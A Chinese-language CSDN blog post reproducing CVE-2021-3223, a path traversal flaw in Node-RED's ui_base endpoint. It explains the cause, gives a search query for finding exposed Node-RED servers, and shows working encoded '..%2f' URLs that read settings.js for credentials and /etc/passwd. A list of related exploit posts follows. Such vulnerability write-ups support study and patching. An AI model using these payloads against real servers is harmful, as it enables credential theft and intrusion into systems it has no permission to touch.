Node-RED ui_base 任意文件读取漏洞 CVE-2021-3223

最新推荐文章于 2024-04-22 14:34:39 发布
最新推荐文章于 2024-04-22 14:34:39 发布
阅读量1.7k 收藏 1
点赞数
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/DUANYU23/article/details/118482927
版权

VoIPMonitor未授权远程代码执行漏洞

0X001前言

Node RED是一个编程工具,用于以新的、有趣的方式连接硬件设备、api和在线服务。

它提供了一个基于浏览器的编辑器,可以使用调色板中的各种节点轻松地将流连接在一起,这些节点可以通过一次单击就部署到其运行时。

0X002 漏洞影响

泄露用户名密码和读取服务器敏感数据

0X003 漏洞原理

Node-RED 在/nodes/ui_base.js中,URL与’/ui_base/js/*'匹配,然后传递给path.join,
缺乏对最终路径的验证会导致路径遍历漏洞,可以利用这个漏洞读取服务器上的敏感数据,比如settings.js

0X004 漏洞复现

0X041 空间搜索寻找目标

搜索语法:title="Node-RED"

在这里插入图片描述

0X041 信息泄露

[ip]/ui_base/js/..%2f..%2f..%2f..%2fsettings.js

获取到用户名和密码
在这里插入图片描述

[ip]/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

获取password文件
在这里插入图片描述

韭菜小白菜
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Node-RED任意文件读取(CVE-2021-3223)
m0_65150886的博客
12-28 619
Node-RED 在/nodes/ui_base.js中,URL与’/ui_base/js/*'匹配,然后传递给path.join,缺乏对最终路径的验证会导致路径遍历漏洞,可以利用这个漏洞读取服务器上的敏感数据,比如settings.js。获取password文件。1.访问ip:port。
node-red File读取好保存实例讲解
10-16
在本篇文章里小编给大家整理了关于node-red File读取好保存的相关知识点内容,有需要的朋友们可以参考下。
NodeRed节点编辑用于边缘计算和规则引擎,能做带UI界面和业务逻辑的上位机或前端应用吗?
最新发布
qq_69807227的博客
04-22 659
什么是UIOTOS? 一款拥有独创专利技术的前端零代码工具,专注于解决前端界面开发定制难题,原型即应用! 具有页面嵌套、属性继承、节点连线等全新特性,学习门槛低,功能极为灵活。 用户无需懂任何前端开发技术,简单了解使用规则,就能够按照业务需求,定制开发复杂的WEB应用。 主要面向后端/算法工程师、硬件/电气工程师,以及产品经理、UI、美术、实施工程师等。 适用于搭建基于物联网平台等的上层业务应用。实现前端开发不求人,项目交付快好省!
CVE漏洞复现-CVE-2023-32233 NetFilter权限提升
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
06-06 3230
Netfilter是Linux 内核中的网络数据包处理框架(iptables)通过各种规则和过滤器,基于数据包的来源、目标地址、协议类型、端口号等信息,控制网络流量和数据包的转发和处理具体,详情请见。
node-red进行读写redis
A_awen的博客
12-30 2293
node-red进行读写redis 控件讲解 1.instance节点 instance 是一个实例及诶单,在流或者全局上下文中注入Redis连接。作为一个配置节点使用 注:一般刚开始拖拽过去会显示redis,正常。 实例节点配置: 添加新的server,一般都会保存默认, 初次配置需要创建一个新的server,主要是Name里面填写带端口号的redis服务器地址 初次配置需要创建一个新的server,主要是Name里面填写带端口号
CVE-2021-42342漏洞复现及docker环境搭建
axdnoob的博客
07-18 2968
CVE-2021-42342 漏洞复现
CVE-2018-18778.docx
07-23
**CVE-2018-18778:mini_httpd任意文件读取漏洞详解** CVE-2018-18778 是一个针对 mini_httpd 服务器的严重安全漏洞,它允许攻击者通过精心构造的HTTP请求来读取服务器上的任意文件。这个漏洞源于 mini_httpd 对于...
浅谈Node.js CVE-2017-14849 漏洞分析(详细步骤)
10-19
【Node.js CVE-2017-14849 漏洞分析】 Node.js 是一个基于 Chrome V8 引擎的 JavaScript 运行时,它提供了高效的事件驱动、非阻塞 I/O 模型,使得开发高性能的网络应用变得简单。Express,则是建立在 Node.js 平台...
CVE-2018-8120-exp.zip_C++_CVE-2018-8120_cve_漏洞利用
09-23
**CVE-2018-8120详解:Windows LSA权限提升漏洞** CVE-2018-8120是一个针对Windows操作系统的安全漏洞,它属于本地权限提升(Local Security Authority Subsystem Service, LSA)漏洞类型。这个漏洞主要影响Windows...
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
GitLab任意文件读取漏洞(CVE-2020-10977)POC
01-15
检测脚本
CVE-2021-25646-Apache Druid漏洞POC.py
02-26
CVE-2021-25646-Apache Druid漏洞POC.py
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
hikvision_CVE-2017-7921_auth_bypass_config_decryptor-main.zip
05-20
标题 "hikvision_CVE-2017-7921_auth_bypass_config_decryptor-main.zip" 指向的是一个与海康威视(Hikvision)设备相关的安全漏洞,具体是CVE-2017-7921认证绕过漏洞。这个压缩包可能包含一个工具或指南,用于解析...
Git安全漏洞检查CVE-2021-21300
GitCode
03-16 2235
CVE-2021-21300 安全漏洞检查 本项目模拟一个利用CVE-2021-21300漏洞执行仓库内恶意脚本的行为,如果您的git客户端有 CVE-2021-21300 的安全漏洞,执行 git clone 本仓库时会输出以下内容 CVE-2021-21300 detected !!! Please update your git to fix the vulnerability CVE-2021-21300 影响分析 由于对 symbolic links 处理的问题,导致在不区分大小写的文件系统例
CVE-2021-21975&CVE-2021-21983 VMware vRealize SSRF、任意文件上传漏洞分析
爱国小白帽
04-13 973
报告编号:B6-2021-041303 报告来源:360CERT 报告作者:ghtwf01 更新日期:2021-04-13 0x01 漏洞概述 VMware vRealize Operations 可在由 AI 提供支持的统一平台中针对私有云、混合云和多云环境提供自动配置 IT 运维管理套件。 本次安全更新修复了一处服务端请求伪造漏洞,一处任意文件上传漏洞。未经身份验证的攻击者通过访问特定的api传入恶意数据,最终在目标服务器上触发漏洞。 0x02 漏洞分析 CVE-2021-21975 位于casa.
物联网开源组件安全:Node-RED白盒审计
Tencent_SRC的博客
02-19 1333
文|腾讯研发安全团队Spine、martinzhou背景Node-RED是IBM开源的低代码物联网编排工具,在物联网领域有广泛应用,包括研华WISE PaaS、西门子Iot2000、美国g...
Apache Spark 命令注入漏洞CVE-2022-33891)修复与利用
漏洞允许攻击者执行任意命令,包括读取、写入和删除文件、执行系统命令等。 影响版本: 该漏洞影响 Apache Spark 版本小于 3.0.3、3.1.1 到 3.1.2 以及 3.3.0 及以上版本。 修复方案: 为了修复该漏洞,建议升级...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值